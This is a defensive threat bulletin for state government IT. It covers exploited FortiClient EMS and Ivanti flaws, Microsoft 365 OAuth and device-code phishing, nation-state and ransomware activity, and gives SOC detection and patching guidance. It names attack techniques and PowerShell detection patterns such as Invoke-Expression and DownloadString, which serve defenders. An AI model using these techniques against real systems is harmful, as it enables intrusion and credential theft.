When Your Identity Platform Becomes the Front Door: Critical Threats Facing State Government IT

<p><strong>Threat Assessment Level: ELEVATED &mdash; Trending HIGH</strong></p> <p><em>Changed from ELEVATED (stable) in the prior cycle to ELEVATED &mdash; Trending HIGH based on: (1) a second actively exploited critical vulnerability in FortiClient EMS within weeks, (2) three independent attack campaigns converging on Microsoft 365 identity flows, and (3) continued nation-state targeting of government networks by Chinese and North Korean actors.</em></p> <p>State government IT leaders face a threat environment this week that demands immediate attention on two fronts: <strong>perimeter appliance exploitation</strong> that continues to accelerate, and a <strong>fundamental shift in how attackers gain access</strong> &mdash; away from traditional network exploitation and toward abuse of legitimate cloud authentication mechanisms.</p> <p>This is not a theoretical warning. As of this writing, a critical Fortinet vulnerability is being exploited in the wild, a Chinese espionage group is using Microsoft's own OAuth consent flows to compromise government organizations, and a phishing-as-a-service platform has deployed over 1,000 domains targeting the device-code authentication that many state agencies rely on for shared kiosks and field devices.</p> <p>The common thread: <strong>your identity platform is now the perimeter</strong>, and it requires the same defensive rigor you apply to firewalls and VPN concentrators.</p> <h2><strong>What Changed This Week&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</strong></h2> <p>The past seven days brought a convergence of threats that individually would warrant attention and collectively demand coordinated action:</p> <ul> <li><strong>FortiClient EMS CVE-2026-35616 (CVSS 9.8)</strong> &mdash; A new critical improper access control vulnerability, confirmed actively exploited in the wild, affecting FortiClient EMS versions 7.4.5&ndash;7.4.6. This is the <strong>second</strong> critical FortiClient EMS vulnerability in recent weeks (following CVE-2026-21643, a SQL injection flaw). Unauthenticated attackers can achieve full server compromise.</li> <li><strong>TA416 / Mustang Panda resumes government espionage</strong> &mdash; This China-linked group is actively targeting government organizations using OAuth consent phishing and the PlugX backdoor. Traditional email security controls will not catch this &mdash; the attack abuses legitimate Microsoft authentication flows.</li> <li><strong>EvilTokens PhaaS goes live at scale; Tycoon 2FA pivots to new infrastructure</strong> &mdash; A new phishing-as-a-service platform has deployed 1,000+ domains targeting device-code and OAuth consent flows in Microsoft 365. It converts stolen tokens into Primary Refresh Tokens (PRTs), enabling persistent access that <strong>survives password resets</strong>. Separately, Tycoon 2FA operators pivoted to new proxy infrastructure following a recent takedown, demonstrating continued operational resilience.</li> <li><strong>Ivanti EPMM exploitation expands</strong> &mdash; A new campaign (distinct from earlier activity) is exploiting CVE-2026-1281 and CVE-2026-1340 (both CVSS 9.8, both in CISA's Known Exploited Vulnerabilities catalog) against government targets.</li> <li><strong>Three CISA ICS advisories</strong> affecting Siemens SICAM, Yokogawa CENTUM VP, and Hitachi Energy Ellipse &mdash; all systems found in state utility and facilities management environments.</li> <li><strong>Ransomware surge against government targets</strong> &mdash; DragonForce, Akira, Qilin, and NightSpire all posted new victims within a 72-hour window (April 2&ndash;4), all groups with confirmed state and local government targeting profiles. The operational tempo shows no sign of decreasing.</li> <li><strong>Kimsuky updates attack chain</strong> &mdash; The North Korean espionage group has refreshed its delivery chain (LNK&rarr;XML&rarr;VBS&rarr;PS1&rarr;Python backdoor) with Dropbox-based command-and-control staging, actively targeting government, construction, and telecom sectors.</li> <li><strong>Iranian retaliatory operations active</strong> &mdash; Following a DOJ seizure of Iranian cyber infrastructure on March 19, APT42, CyberAv3ngers, MuddyWater, and Handala/Void Manticore have initiated retaliatory operations, with pre-positioning in U.S. critical infrastructure confirmed.</li> </ul> <h2><strong>Threat Timeline&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</strong></h2> <table> <thead> <tr> <th> <p>Date</p> </th> <th> <p>Event</p> </th> <th> <p>Severity</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>Mar 19, 2026</strong></p> </td> <td> <p>DOJ seizure of Iranian cyber infrastructure triggers retaliatory operations by APT42, CyberAv3ngers, MuddyWater, and Handala/Void Manticore; pre-positioning in U.S. critical infrastructure confirmed</p> </td> <td> <p>CRITICAL</p> </td> </tr> <tr> <td> <p><strong>Apr 1&ndash;2, 2026</strong></p> </td> <td> <p>CISA adds CVE-2026-1281 (Ivanti EPMM) to Known Exploited Vulnerabilities catalog; three ICS advisories published for Siemens SICAM, Yokogawa CENTUM VP, Hitachi Energy Ellipse</p> </td> <td> <p>HIGH</p> </td> </tr> <tr> <td> <p><strong>Apr 2&ndash;4, 2026</strong></p> </td> <td> <p>DragonForce, Akira, Qilin, and NightSpire ransomware groups all post new victims within 72-hour window &mdash; all with confirmed government targeting profiles</p> </td> <td> <p>HIGH</p> </td> </tr> <tr> <td> <p><strong>Apr 3&ndash;4, 2026</strong></p> </td> <td> <p>TA416 (Mustang Panda) campaign targeting government organizations with OAuth phishing and PlugX reported by multiple sources</p> </td> <td> <p>HIGH</p> </td> </tr> <tr> <td> <p><strong>Apr 4, 2026</strong></p> </td> <td> <p>Ivanti EPMM exploitation escalates to four distinct campaigns including MISTBRICK malware; Cisco SD-WAN CVE-2026-20127 (CVSS 10.0) confirmed under active government-exclusive exploitation</p> </td> <td> <p>CRITICAL</p> </td> </tr> <tr> <td> <p><strong>Apr 5, 2026</strong></p> </td> <td> <p>Kimsuky updates attack chain with Python backdoor and Dropbox staging; Tycoon 2FA pivots to new infrastructure after takedown; DeepLoad ClickFix fileless campaign reported</p> </td> <td> <p>HIGH</p> </td> </tr> <tr> <td> <p><strong>Apr 6, 2026</strong></p> </td> <td> <p>FortiClient EMS CVE-2026-35616 (CVSS 9.8) confirmed actively exploited in the wild; EvilTokens PhaaS platform identified with 1,000+ phishing domains targeting M365 device-code flows</p> </td> <td> <p>CRITICAL</p> </td> </tr> </tbody> </table> <h2><strong>Critical Vulnerability Alert: FortiClient EMS Under Dual Exploitation</strong></h2> <p>State agencies running Fortinet's FortiClient Enterprise Management Server face an unprecedented situation: <strong>two distinct critical vulnerabilities in the same product, both actively exploited, within weeks of each other.</strong></p> <table> <thead> <tr> <th> <p>CVE</p> </th> <th> <p>CVSS</p> </th> <th> <p>Attack Vector</p> </th> <th> <p>Affected Versions</p> </th> <th> <p>Status</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>CVE-2026-35616</strong></p> </td> <td> <p>9.8</p> </td> <td> <p>Improper access control &mdash; unauthenticated RCE via crafted requests</p> </td> <td> <p>7.4.5 &ndash; 7.4.6</p> </td> <td> <p><strong>Actively exploited</strong></p> </td> </tr> <tr> <td> <p><strong>CVE-2026-21643</strong></p> </td> <td> <p>9.8</p> </td> <td> <p>SQL injection &mdash; unauthenticated RCE</p> </td> <td> <p>Earlier versions</p> </td> <td> <p><strong>Actively exploited</strong></p> </td> </tr> </tbody> </table> <p>Two critical vulnerabilities with different root causes in the same product in rapid succession suggests systemic code quality concerns. <strong>State CISOs should not only patch immediately but begin evaluating whether FortiClient EMS remains an acceptable risk</strong> for endpoint management, or whether migration planning should begin.</p> <p><strong>ATT&amp;CK Techniques:</strong> T1190 (Exploit Public-Facing Application), T1059 (Command and Scripting Interpreter)</p> <h2><strong>The Identity Perimeter: Three Converging Threats to Microsoft 365</strong></h2> <p>The most strategically significant development this week is the convergence of <strong>three independent attack campaigns</strong> all targeting Microsoft 365 identity and authentication flows. This is not coincidence &mdash; it reflects a fundamental shift in attacker tradecraft.</p> <h3><strong>1. TA416 / Mustang Panda &mdash; Nation-State OAuth Espionage</strong></h3> <p><strong>Actor:</strong> TA416 (aliases: Mustang Panda, RedDelta, BRONZE PRESIDENT, STATELY TAURUS) &mdash; China-linked <strong>Target:</strong> Government and diplomatic organizations <strong>Technique:</strong> OAuth consent phishing to gain initial access to M365 tenants, followed by DLL sideloading to deploy the <strong>PlugX</strong> backdoor, with Dropbox used for staging</p> <p>This campaign uses web-bug reconnaissance emails to identify active targets before delivering the phishing payload. Because it abuses legitimate Microsoft OAuth consent flows, <strong>traditional email filtering and URL reputation services will not detect it.</strong></p> <p><strong>ATT&amp;CK Techniques:</strong> T1566.001/002 (Spearphishing), T1528 (Steal Application Access Token), T1574.002 (DLL Side-Loading), T1102 (Web Service &mdash; Dropbox)</p> <h3><strong>2. EvilTokens &mdash; Commoditized Token Theft at Scale</strong></h3> <p><strong>Actor:</strong> Criminal (PhaaS operator) <strong>Scale:</strong> 1,000+ phishing domains deployed <strong>Technique:</strong> Device-code and OAuth phishing with Primary Refresh Token (PRT) conversion</p> <p>EvilTokens is particularly dangerous for state government because:</p> <ul> <li>Many agencies use device-code authentication for shared kiosks, field devices, and conference room systems</li> <li>PRT theft enables persistent access that <strong>survives password resets and MFA re-enrollment</strong></li> <li>Conditional Access policies in many state tenants do not explicitly block device-code flows</li> </ul> <h3><strong>3. Tycoon 2FA &mdash; Resilient MFA Bypass Infrastructure</strong></h3> <p><strong>Actor:</strong> Criminal (PhaaS operator) <strong>Technique:</strong> Real-time WebSocket-based MFA capture with proxy infrastructure</p> <p>After a recent takedown, Tycoon 2FA operators pivoted to new proxy infrastructure and ASNs, demonstrating operational resilience. The platform captures MFA tokens in real time, defeating time-based one-time passwords.</p> <p><strong>ATT&amp;CK Techniques:</strong> T1111 (Multi-Factor Authentication Interception), T1539 (Steal Web Session Cookie)</p> <p><strong>The strategic implication is clear:</strong> Your Azure AD Conditional Access configuration is now your primary defensive control against initial access &mdash; not your firewall, not your email gateway. It needs the same rigor, review cadence, and change management as firewall rule sets.</p> <h2><strong>Nation-State Activity: What's Active and What's Notably Absent</strong></h2> <h3><strong>Active Campaigns Targeting Government</strong></h3> <table> <thead> <tr> <th> <p>Actor</p> </th> <th> <p>Origin</p> </th> <th> <p>Current Activity</p> </th> <th> <p>Target</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>TA416 / Mustang Panda</strong></p> </td> <td> <p>China</p> </td> <td> <p>OAuth consent phishing + PlugX deployment</p> </td> <td> <p>Government, diplomatic</p> </td> </tr> <tr> <td> <p><strong>Kimsuky</strong></p> </td> <td> <p>North Korea (DPRK)</p> </td> <td> <p>Updated LNK&rarr;XML&rarr;VBS&rarr;PS1 chain delivering Python backdoor with Dropbox C2</p> </td> <td> <p>Government, construction, telecom</p> </td> </tr> <tr> <td> <p><strong>APT42</strong></p> </td> <td> <p>Iran (IRGC-IO)</p> </td> <td> <p>Retaliatory operations following DOJ infrastructure seizure</p> </td> <td> <p>U.S. critical infrastructure</p> </td> </tr> <tr> <td> <p><strong>CyberAv3ngers</strong></p> </td> <td> <p>Iran (IRGC)</p> </td> <td> <p>Pre-positioning in U.S. critical infrastructure</p> </td> <td> <p>Water, energy</p> </td> </tr> <tr> <td> <p><strong>MuddyWater / Seedworm</strong></p> </td> <td> <p>Iran (MOIS)</p> </td> <td> <p>Active operations</p> </td> <td> <p>Government</p> </td> </tr> <tr> <td> <p><strong>APT28 / Fancy Bear</strong></p> </td> <td> <p>Russia</p> </td> <td> <p>Active IOCs in intelligence feeds</p> </td> <td> <p>Government</p> </td> </tr> <tr> <td> <p><strong>APT41</strong></p> </td> <td> <p>China</p> </td> <td> <p>Tracked activity</p> </td> <td> <p>Government, multiple sectors</p> </td> </tr> </tbody> </table> <h3><strong>Notable Absences</strong></h3> <p><strong>Volt Typhoon and Salt Typhoon</strong> &mdash; the Chinese APTs previously considered the most prominent nation-state threat to U.S. government infrastructure &mdash; produced <strong>zero indicators this cycle.</strong> Combined with the emergence of TA416 diplomatic espionage activity, this may signal a strategic pivot in Chinese cyber operations from destructive pre-positioning to intelligence collection. This does not reduce the threat level &mdash; it changes what you need to detect, shifting the focus from network anomaly detection to identity and authentication monitoring.</p> <p><strong>LockBit</strong> &mdash; no direct activity observed. The last Anomali ThreatStream Next-Gen update was December 2025. Law enforcement disruption appears to have lasting effects, but successor groups (DragonForce, NightSpire, Qilin) have absorbed the operational tempo.</p> <h2><strong>Ransomware: The SLTT Targeting Continues</strong></h2> <p>The ransomware threat to state and local government remains acute. Within a 72-hour window (April 2&ndash;4), <strong>DragonForce, Akira, Qilin, and NightSpire</strong> all posted new victims &mdash; all groups with confirmed government targeting profiles.</p> <p>State and local government continues to be viewed by ransomware operators as a <strong>high-yield, low-defense target environment.</strong> The summer of 2025 was described by multiple sources as "one of the most devastating periods for municipal cybersecurity in U.S. history," and the operational tempo has not decreased.</p> <p>Key ransomware-adjacent developments this cycle:</p> <ul> <li><strong>Yurei ransomware toolkit</strong> exposure reported in weekly threat recap</li> <li><strong>DPRK modular malware</strong> with ransomware capabilities continues to evolve</li> <li><strong>Phorpiex botnet</strong> continues delivering LockBit Black payloads (the primary remaining LockBit-adjacent threat)</li> </ul> <h2><strong>ICS/OT: Advisories Affecting State Utility Infrastructure</strong></h2> <p>Three CISA ICS advisories published this week affect systems commonly found in state government utility and facilities management environments:</p> <table> <thead> <tr> <th> <p>Advisory</p> </th> <th> <p>Product</p> </th> <th> <p>Impact</p> </th> <th> <p>Relevance to State Gov</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>ICSA-26-092-01</strong></p> </td> <td> <p>Siemens SICAM 8</p> </td> <td> <p>Denial of service in power grid protection/automation</p> </td> <td> <p>State utility partners</p> </td> </tr> <tr> <td> <p><strong>ICSA-26-092-02</strong></p> </td> <td> <p>Yokogawa CENTUM VP</p> </td> <td> <p>Unauthorized login and permission modification in DCS</p> </td> <td> <p>Water treatment, power generation</p> </td> </tr> <tr> <td> <p><strong>ICSA-26-092-03</strong></p> </td> <td> <p>Hitachi Energy Ellipse</p> </td> <td> <p>Jasper Report vulnerability in enterprise asset management</p> </td> <td> <p>Utility maintenance management</p> </td> </tr> </tbody> </table> <p>Intelligence reporting also notes that <strong>thousands of internet-exposed ICS/OT devices are being actively scanned.</strong> State agencies with OT environments &mdash; particularly water/wastewater utilities and building management systems &mdash; should verify that no ICS devices are directly internet-accessible.</p> <h2><strong>Predictive Analysis: What Comes Next</strong></h2> <table> <thead> <tr> <th> <p>Prediction</p> </th> <th> <p>Probability</p> </th> <th> <p>Basis</p> </th> </tr> </thead> <tbody> <tr> <td> <p>Additional exploitation of FortiClient EMS CVE-2026-35616 as PoC code circulates; CISA KEV addition within 48 hours</p> </td> <td> <p><strong>HIGH (&gt;75%)</strong></p> </td> <td> <p>Active exploitation confirmed; vendor advisory published; pattern matches prior CVE-2026-21643 trajectory</p> </td> </tr> <tr> <td> <p>TA416 / Mustang Panda campaign expands beyond European targets to include U.S. state/local government</p> </td> <td> <p><strong>MODERATE (50&ndash;75%)</strong></p> </td> <td> <p>Historical Mustang Panda targeting patterns include U.S. government; OAuth technique is geography-agnostic</p> </td> </tr> <tr> <td> <p>EvilTokens or Tycoon 2FA infrastructure used in credential theft campaign specifically targeting government M365 tenants during spring tax season</p> </td> <td> <p><strong>MODERATE (50&ndash;75%)</strong></p> </td> <td> <p>Tax season phishing historically peaks in April; PhaaS platforms lower the barrier to targeted campaigns</p> </td> </tr> <tr> <td> <p>Ransomware group posts a U.S. state or local government victim within 14 days</p> </td> <td> <p><strong>HIGH (&gt;75%)</strong></p> </td> <td> <p>Four groups posted victims in 72-hour window; SLTT targeting profile confirmed across all four</p> </td> </tr> <tr> <td> <p>Iranian retaliatory cyber operations escalate following DOJ infrastructure seizure</p> </td> <td> <p><strong>MODERATE (50&ndash;75%)</strong></p> </td> <td> <p>Historical pattern of escalation following law enforcement action; multiple IRGC-affiliated groups already active</p> </td> </tr> </tbody> </table> <h2><strong>SOC Operational Guidance&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</strong></h2> <h3><strong>Detection Priorities</strong></h3> <ol> <li><strong> Microsoft 365 OAuth and Device-Code Abuse (CRITICAL)</strong></li> </ol> <ul> <li><strong>ATT&amp;CK:</strong> T1528 (Steal Application Access Token), T1539 (Steal Web Session Cookie), T1078.004 (Valid Accounts: Cloud)</li> <li><strong>Hunt Hypothesis:</strong> Adversaries are using OAuth consent phishing and device-code flows to obtain persistent access tokens to state M365 tenants. Look for anomalous consent grants and device-code authentications from unexpected locations.</li> <li><strong>What to Monitor:</strong></li> </ul> <ul> <li>M365 Unified Audit Log: Operation: Consent to application &mdash; alert on any new OAuth consent grants, especially from non-admin users</li> <li>Azure AD Sign-in Logs: filter for authenticationProtocol: deviceCode &mdash; baseline normal device-code usage and alert on deviations</li> <li>Azure AD Audit Logs: new Service Principal creation or credential additions (T1098.001)</li> <li>Impossible travel or anomalous location for token-based authentications</li> </ul> <ul> <li><strong>Detection Rule:</strong> Alert when Consent to application is followed by Add service principal credentials within 24 hours from the same user or IP</li> </ul> <ol start="2"> <li><strong> FortiClient EMS Exploitation (CRITICAL)</strong></li> </ol> <ul> <li><strong>ATT&amp;CK:</strong> T1190 (Exploit Public-Facing Application), T1059 (Command and Scripting Interpreter)</li> <li><strong>Hunt Hypothesis:</strong> Attackers are sending crafted requests to FortiClient EMS servers to achieve unauthenticated code execution. Compromised EMS servers may be used as pivot points into the managed endpoint fleet.</li> <li><strong>What to Monitor:</strong></li> </ul> <ul> <li>FortiClient EMS server access logs for anomalous or malformed HTTP requests</li> <li>Unexpected child processes spawned by EMS service processes</li> <li>Outbound connections from EMS servers to unknown external IPs</li> <li>Any new scheduled tasks or services created on EMS servers</li> </ul> <ol start="3"> <li><strong> PlugX / DLL Sideloading (HIGH)</strong></li> </ol> <ul> <li><strong>ATT&amp;CK:</strong> T1574.002 (DLL Side-Loading), T1204.002 (Malicious File)</li> <li><strong>Hunt Hypothesis:</strong> TA416 delivers PlugX via legitimate executables that sideload malicious DLLs from ZIP/LNK delivery chains.</li> <li><strong>What to Monitor:</strong></li> </ul> <ul> <li>Execution of LNK files extracted from ZIP archives (especially from email)</li> <li>Known-good executables loading DLLs from unusual paths (e.g., %TEMP%, %APPDATA%)</li> <li>Outbound HTTPS connections to Dropbox API endpoints from non-browser processes</li> <li>Sysmon Event ID 7 (Image Loaded) for DLLs loaded from user-writable directories by signed executables</li> </ul> <ol start="4"> <li><strong> PowerShell and Fileless Execution Chains (HIGH)</strong></li> </ol> <ul> <li><strong>ATT&amp;CK:</strong> T1059.001 (PowerShell), T1059.006 (Python), T1047 (WMI), T1055 (Process Injection)</li> <li><strong>Hunt Hypothesis:</strong> Kimsuky's updated chain (LNK&rarr;XML&rarr;VBS&rarr;PS1&rarr;Python) and DeepLoad ClickFix both rely on PowerShell for initial execution and in-memory payload delivery.</li> <li><strong>What to Monitor:</strong></li> </ul> <ul> <li>PowerShell Script Block Logging (Event ID 4104) for encoded commands, Invoke-Expression, DownloadString, and Base64 patterns</li> <li>WMI event subscriptions (T1546.003) for persistence</li> <li>Python process execution from non-standard paths</li> <li>USB device insertion events correlated with subsequent script execution (DeepLoad uses USB persistence via T1091)</li> </ul> <ol start="5"> <li><strong> Ivanti EPMM Exploitation (HIGH)</strong></li> </ol> <ul> <li><strong>ATT&amp;CK:</strong> T1190 (Exploit Public-Facing Application)</li> <li><strong>What to Monitor:</strong></li> </ul> <ul> <li>Ivanti EPMM server logs for unauthenticated API calls or code injection patterns</li> <li>Unexpected outbound connections from EPMM servers</li> <li>New mobile device enrollments or policy changes not initiated by administrators</li> </ul> <h2><strong>Sector-Specific Defensive Priorities</strong></h2> <h3><strong>Government (State and Local Agencies)</strong></h3> <p><strong>Primary threats:</strong> TA416 OAuth espionage, EvilTokens credential theft, ransomware (Qilin, DragonForce, Akira, NightSpire), Kimsuky espionage</p> <ul> <li>Audit all Azure AD Conditional Access policies &mdash; specifically verify that device-code authentication is blocked for all users except those with documented operational need</li> <li>Review OAuth consent settings: set User consent for applications to "Do not allow user consent" or restrict to verified publishers only</li> <li>Ensure all citizen-facing portals (tax, DMV, benefits) have WAF protections and are not running vulnerable Ivanti or Fortinet components</li> <li>Conduct tabletop exercise for ransomware scenario targeting a citizen services agency during peak tax season</li> </ul> <h3><strong>Financial Services</strong></h3> <p><strong>Primary threats:</strong> Ivanti EPMM exploitation (financial services explicitly listed as target), EvilTokens token theft, Tycoon 2FA MFA bypass</p> <ul> <li>Verify Ivanti EPMM patching against CVE-2026-1281 and CVE-2026-1340 &mdash; financial services is an explicitly named target in the latest campaign</li> <li>Implement continuous access evaluation (CAE) for all financial transaction systems accessed via M365 authentication</li> <li>Monitor for anomalous API token usage patterns that could indicate PRT theft</li> </ul> <h3><strong>Energy and Utilities</strong></h3> <p><strong>Primary threats:</strong> Iranian APT pre-positioning (CyberAv3ngers, APT42), ICS/OT vulnerabilities (Siemens SICAM, Yokogawa CENTUM VP, Hitachi Ellipse), Volt Typhoon residual risk</p> <ul> <li>Immediately assess exposure to ICSA-26-092-01 (Siemens SICAM), ICSA-26-092-02 (Yokogawa CENTUM VP), and ICSA-26-092-03 (Hitachi Energy Ellipse)</li> <li>Verify network segmentation between IT and OT environments &mdash; no ICS/SCADA devices should be directly internet-accessible</li> <li>Review access controls on CENTUM VP systems &mdash; the Yokogawa advisory specifically addresses unauthorized PROG user login</li> <li>Increase monitoring for Iranian APT indicators given confirmed retaliatory operations following DOJ infrastructure seizure</li> </ul> <h3><strong>Healthcare</strong></h3> <p><strong>Primary threats:</strong> Ransomware (all four active groups target healthcare adjacently), credential theft via EvilTokens/Tycoon 2FA, supply chain compromise</p> <ul> <li>Healthcare agencies managing Medicaid and public health data should prioritize M365 Conditional Access hardening &mdash; stolen tokens provide access to protected health information</li> <li>Ensure backup and recovery procedures are tested for ransomware scenarios &mdash; healthcare data is high-value for both encryption and exfiltration</li> <li>Monitor for PowerShell-based fileless attacks (Kimsuky, DeepLoad) targeting clinical and administrative workstations</li> </ul> <h3><strong>Aviation and Logistics</strong></h3> <p><strong>Primary threats:</strong> TA416/Mustang Panda (transportation explicitly listed in Ivanti campaign targeting), supply chain compromise, nation-state espionage</p> <ul> <li>Transportation agencies are explicitly named targets in the latest Ivanti EPMM exploitation campaign &mdash; verify patching status immediately</li> <li>Monitor for PlugX indicators and DLL sideloading patterns, particularly on systems handling logistics and supply chain data</li> <li>Review third-party vendor access to transportation management systems for supply chain risk</li> </ul> <h2><strong>Prioritized Defense Recommendations</strong></h2> <h3><strong>IMMEDIATE (Within 24 Hours)</strong></h3> <table> <thead> <tr> <th> <p>Priority</p> </th> <th> <p>Owner</p> </th> <th> <p>Action</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>CRITICAL</strong></p> </td> <td> <p>IT Operations</p> </td> <td> <p><strong>Patch FortiClient EMS</strong> against CVE-2026-35616 on ALL instances running versions 7.4.5&ndash;7.4.6. Review EMS server logs for anomalous requests since April 1 to determine if exploitation has already occurred.</p> </td> </tr> <tr> <td> <p><strong>CRITICAL</strong></p> </td> <td> <p>IT Operations</p> </td> <td> <p><strong>Confirm Ivanti EPMM patching</strong> against CVE-2026-1281 and CVE-2026-1340 (both CVSS 9.8, CISA KEV). A new campaign is actively exploiting these against government networks.</p> </td> </tr> <tr> <td> <p><strong>CRITICAL</strong></p> </td> <td> <p>SOC / Identity Team</p> </td> <td> <p><strong>Block device-code authentication</strong> in Azure AD Conditional Access policies unless explicitly required for documented use cases. Audit existing device-code grants for anomalous registrations.</p> </td> </tr> <tr> <td> <p><strong>HIGH</strong></p> </td> <td> <p>SOC</p> </td> <td> <p><strong>Enable alerting</strong> on M365 Unified Audit Log for Consent to application events and Azure AD sign-in logs for deviceCode authentication protocol.</p> </td> </tr> </tbody> </table> <h3><strong>7-DAY Actions</strong></h3> <table> <thead> <tr> <th> <p>Priority</p> </th> <th> <p>Owner</p> </th> <th> <p>Action</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>HIGH</strong></p> </td> <td> <p>SOC / Identity Team</p> </td> <td> <p><strong>Audit Azure AD Service Principals</strong> for Global Administrator or Privileged Role Administrator role assignments. Cross-reference with Application Administrator assignments to identify privilege escalation paths. Remove unnecessary high-privilege assignments.</p> </td> </tr> <tr> <td> <p><strong>HIGH</strong></p> </td> <td> <p>SOC</p> </td> <td> <p><strong>Deploy TA416/Mustang Panda detection rules:</strong> OAuth consent grant monitoring, LNK-from-ZIP execution alerts, DLL sideloading detection (signed executables loading DLLs from user-writable directories), and Dropbox API connections from non-browser processes.</p> </td> </tr> <tr> <td> <p><strong>HIGH</strong></p> </td> <td> <p>IT Operations / OT</p> </td> <td> <p><strong>Coordinate with utility partners</strong> to verify patching for Siemens SICAM 8 (ICSA-26-092-01), Yokogawa CENTUM VP (ICSA-26-092-02), and Hitachi Energy Ellipse (ICSA-26-092-03). Confirm no ICS/OT devices are internet-exposed.</p> </td> </tr> <tr> <td> <p><strong>MODERATE</strong></p> </td> <td> <p>SOC</p> </td> <td> <p><strong>Implement PowerShell Script Block Logging</strong> (Event ID 4104) and monitor for Kimsuky attack chain indicators: encoded PowerShell, Python execution from non-standard paths, and WMI persistence.</p> </td> </tr> </tbody> </table> <h3><strong>30-DAY Actions</strong></h3> <table> <thead> <tr> <th> <p>Priority</p> </th> <th> <p>Owner</p> </th> <th> <p>Action</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>HIGH</strong></p> </td> <td> <p>CISO / Identity Team</p> </td> <td> <p><strong>Commission comprehensive M365 Conditional Access review</strong> addressing EvilTokens, Tycoon 2FA, and TA416 OAuth abuse vectors. Evaluate: device-code flow restrictions, token lifetime policies, continuous access evaluation (CAE) enforcement, and user consent settings for applications.</p> </td> </tr> <tr> <td> <p><strong>HIGH</strong></p> </td> <td> <p>IT Operations</p> </td> <td> <p><strong>Deploy PowerShell Constrained Language Mode</strong> across all endpoints to limit fileless attack chains (Kimsuky PS1 chains, DeepLoad ClickFix, and similar).</p> </td> </tr> <tr> <td> <p><strong>MODERATE</strong></p> </td> <td> <p>CISO</p> </td> <td> <p><strong>Evaluate FortiClient EMS risk posture.</strong> Two critical vulnerabilities with different root causes in rapid succession warrants a formal risk assessment of continued use versus migration to an alternative endpoint management platform.</p> </td> </tr> <tr> <td> <p><strong>MODERATE</strong></p> </td> <td> <p>CISO / IR Team</p> </td> <td> <p><strong>Conduct ransomware tabletop exercise</strong> simulating a Qilin or DragonForce attack against a citizen-facing agency during peak service demand. Test backup restoration, communication plans, and decision authority for ransom payment.</p> </td> </tr> </tbody> </table> <h2><strong>The Bottom Line&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</strong></h2> <p>This week's intelligence paints a picture of a threat environment that is shifting beneath our feet. The traditional security model &mdash; patch the firewall, filter the email, monitor the network &mdash; is necessary but no longer sufficient. When nation-state actors like TA416 and commoditized platforms like EvilTokens are both targeting the same Microsoft authentication flows that every state agency depends on, <strong>your identity infrastructure IS your security perimeter.</strong></p> <p>The four critical CVEs demanding immediate patching (CVE-2026-35616, CVE-2026-21643, CVE-2026-1281, CVE-2026-1340) are urgent. But the strategic action that will determine your security posture for the next quarter is the Azure AD Conditional Access review. Device-code flows, OAuth consent grants, and token lifetime policies are the controls that stand between your agency's data and the adversaries described in this report.</p> <p>Patch today. Review your identity controls this week. Plan your architecture decisions this month.</p> <p>The adversaries are not waiting.</p>